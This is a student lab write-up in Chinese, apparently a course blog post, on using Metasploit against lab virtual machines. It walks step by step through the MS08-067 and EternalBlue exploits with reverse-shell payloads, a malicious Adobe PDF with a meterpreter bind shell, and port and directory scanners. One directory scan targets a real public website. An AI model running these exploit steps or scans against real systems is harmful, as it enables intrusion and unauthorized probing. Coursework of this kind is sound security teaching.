2019-2020-2 20174319安睿韬《网络对抗技术》Exp6 MSF基础应用

目录

一、基础知识

二、实验目标

三、实验内容

四、主动攻击的实践

五、攻击浏览器的实践

六、攻击客户端的实践

七、成功应用任何一个辅助模块

八、老师提问

九、所遇到的问题及其解决方法

十、实验感想

 


 

一、基础知识

    • MSF的渗透模块

      • 进入MSF控制台后,用show exploits查看所有渗透模块:

      • 也可以进入/usr/share/metasploit-framework/modules查看模块源码目录,它们有6个:
        • 渗透攻击模块(Exploit Modules)
        • 辅助模块(Auxiliary Modules)
        • 攻击载荷(Payload Modules)
        • 空字段模块(Nop Modules)
        • 编码模块(Encoders)
        • 后渗透攻击模块(Post)
    • 三个用户操作界面

      • MSF控制台:msfconsole
      • Armitage
        • 启动服务器service postgresql start
        • 启动armitagearmitage
      • Web GUI

二、实验目标

    • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

 

三、实验内容

    • 成功主动攻击,如 ms08-067
    • 成功针对浏览器的攻击,如 ms11-050
    • 成功针对客户端的攻击,如 Adobe
    • 成功应用辅助模块的攻击

四、主动攻击的实践

    • ms08_067_netapi

    • 实验环境
      • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.211.129)
      • 靶机:Windows XP Professional(192.168.211.141)
      • 攻击软件:metasploit v5.0.85-dev
      • 测试靶机是否存在此漏洞:
      • 查看靶机OS版本信息,使用命令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.211.141 

      • 查到靶机存在此漏洞

 

      • 输入指令 msfconsole 进入控制台,使用指令 search ms08_067 指令查询一下针对该漏洞能够运用的攻击模块

      • 输入指令 use exploit/windows/smb/ms08_067_netapi 进入该攻击模块,使用 show payloads 查看能够使用的攻击载荷

      • 选择 shell_reverse_tcp,输入指令 set payload generic/shell_reverse_tcp 设置 payload 为反向 tcp 连接

      • 然后部署 payload 参数
      1. set RHOST 192.168.211.141 //设置靶机IP
      2. set LPORT 4319 //设置攻击机端口
      3. set LHOST 192.168.211.129//设置攻击机IP

      • 显示连接需要设置的参数 show options

      •  exploit,成功回连

      • 可以使用 systeminfo 来查看靶机的系统信息,关于计算机及其操作系统的详细配置信息,包括操作系统配置、安全信息、产品 ID 和硬件属性,RAM、磁盘空间和网卡等。

返回目录


 

    •  MS17_010漏洞渗透攻击实践

      • 实验环境
        • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.233.129)
        • 靶机:Windows 7(192.168.233.128)
        • 攻击软件:metasploit v5.0.85-dev
      • 查看靶机OS版本信息,使用命令nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.211.140

      •  启动msfconsole,使用 search ms17_010 指令查询一下针对该漏洞能够运用的攻击模块,发现可使用,输入use exploit/windows/smb/ms17_010_eternalblue

      • show payloads

      • set payload generic/shell_reverse_tcp
      • set RHOST  192.168.211.140 //设置靶机IP
      • set LHOST  192.168.211.129//设置攻击机IP
      • exploit
      • 成功

      • 创建一个文件夹

返回目录


五、攻击浏览器的实践

    • ms17_010_eternalblue

      • 实验环境

        • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.211.129)
        • 靶机:Windows 7
        • 攻击软件:metasploit v5.0.85-dev
      • 操作步骤:
        • use exploit/windows/smb/ms17_010_eternalblue //进入该模块
        • show payloads //显示可用载荷
        • set payload generic/shell_reverse_tcp
        • set RHOST 192.168.211.140 //设置靶机IP,端口默认为445
        • set LHOST 192.168.211.129 //设置攻击机IP
        • exploit //发起渗透攻击

      • 在靶机浏览器输入https://攻击机IP:监听端口

      • 攻击成功!创建了一个文件夹

返回目录


六、攻击客户端的实践

      • 实验环境
        • 攻击机:kali-linux-2020.1-vmware-amd64(192.168.99.116)
        • 靶机:Windows XP Professional +IE 8(192.168.99.227)
      • 操作步骤:
        • 启动 msf 输入 search adobe 查询针对 adobe 攻击模块

      • 使用 use windows/fileformat/adobe_cooltype_sing 设置模块
      • 输入 show payloads 查找有效攻击载荷
      • 使用 set payload windows/meterpreter/bind_tcp 设置 payloads
      • 根据 options 设置相关参数
        • set RHOST 192.168.211.139 //靶机ip
        • set LPORT 4319 //攻击端口
        • exploit //生成pdf

 

      • 使用指令将文件复制9到主文件夹下  mov msf.pdf /home/kali

      • 将生成的 msf.pdf 复制到 Windows XP 中,back 退出当前模块,进入监听模块
        • use exploit/multi/handler //进入监听模块
        • set payload windows/meterpreter/bind_tcp //选择攻击载荷
        • set RHOST 192.168.211.139 //靶机IP
        • set LPORT 4319 //攻击端口
        • exploit

      • 在xp上用adobe reader 9.0 打开文件,kali 里回连成功:

返回目录


 

七、成功应用任何一个辅助模块

    • server_info(唯一)
    • msf 里输入 show auxiliary 查看所有的辅助模块

    • 选择 scanner/steam/server_info,输入 info scanner/steam/server_info 查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
    • 输入 use scanner/steam/server_info 使用漏洞
    • 输入 set RHOSTS 192.168.211.139 为起始IP
    • 输入 exploit 开始攻击

    • 这个网段里没有服务器
    • 使用 dir_scanner 搜索网站目录
    • 输人 use auxiliary/scanner/http/dir_scanner 设置模块
    • 设置参数
      • set THREADS 50
      • setRHOSTS www.baidu.com
      • exploit

    • dir_scanner 模块发现了百度网站目录的 cache http 状态码 200 ,表示请求成功

    • 端口扫描模块

    • 具体有以下几种扫描方式:

      • auxiliary/scanner/portscan/ack:通过 ACK 扫描的方式对防火墙上未被屏蔽的端口进行探测
      • auxiliary/scanner/portscan/ftpbounce :通过 FTP bounce 攻击的原理对 TCP 服务进行枚举,在一些旧的Solaris及FreeBSD系统的FTP服务中此类攻击方式仍能被利用。
      • auxiliary/scanner/portscan/syn :使用发送 TCP SYN 标志的方式探测开放的端口
      • auxiliary/scanner/portscan/tcp:通过一次完整的 TCP 连接来判断端口是否开放
      • auxiliary/scanner/portscan/xmas:通过发送 FIN、PSH、URG 标志,相对而言较为隐蔽。
    • 试试 tcp 扫描,通过一次完整的 TCP 连接来判断端口是否开放

    • 输入 use auxiliary/scanner/portscan/tcp 设置模块

    • 设置参数

      • set RHOSTS 192.168.211.139 //靶机IP
      • set THREADS 50
      • exploit

 

返回目录


 

八、老师提问

    • 用自己的话解释什么是exploit,payload,encode?

      • exploit:是一个漏洞攻击的工具,可以用来将恶意代码、漏洞注入靶机中;
      • payload:是有效荷载,是用来真正实施攻击的恶意代码;
      • encode:编码。可以理解是给 payload 套一件“羊皮”,让杀软难以分辨。

 返回目录


 

九、所遇到的问题及其解决方法

  • 耗时一整天都无法安装成功的windows xp,下了近十个镜像文件,没有一个能安装成功,迫于无奈,只好换台式机做实验。

    • 又出现了新的问题,问了很多同学,有的建议重新安装一个镜像,有的建议设置豪target,采纳后都解决未果

    • 正当我快要放弃这个xp任务时,一个同学发了一个镜像文件给我,他建议我把虚拟机的内存调大一些,至少2gb,最后才终于将windows xp安装成功,实验得以继续进行

返回目录


 

十、实验感想

    通过课上听课学习和课后浏览他人博客,发现本次实验是一次相对简单的任务,发现都是利用 msf 来实现漏洞攻击,步骤也很简单,扫描靶机是否有漏洞,配置好载荷,设置好ip地址和端口号,就可以进行入侵。当我信心满满得开始做实验时,却面临了最大的问题,windows xp安装不成功,耽误了一整天的时间,这就是“万事开头难”吗,在这个期间,我可以说是把网上得所有资源都挖空了,都没法将系统安装成功。好在正处于崩溃边缘时,一个朋友雪中送炭,给了我一个镜像文件,并给了我一些提示,才总算把xp装成功,后面得实验也顺利了起来,一小时不到就解决了全部任务。

   通过本次实验也学到了很多的东西,第一点,要抓住主要矛盾和矛盾的主要方面,比如在这次实验中,遇到xp装不上时,不应该一直在上面花太多时间,会影响心情和作业效率,在这个时候,应该赶快做和xp无关的实验,比如以windows7为靶机的任务。第二点,这次实验对于msfconsole的运用也更加熟练。

 

 

 返回目录

 

 

posted @ 2020-04-30 16:05  20174319安睿韬  阅读(176)  评论(0编辑  收藏  举报
锚点链接
跳转一 跳转二
我是占位的块
我是跳转一跳到的位置
我是跳转二跳到的位置
我是占位的块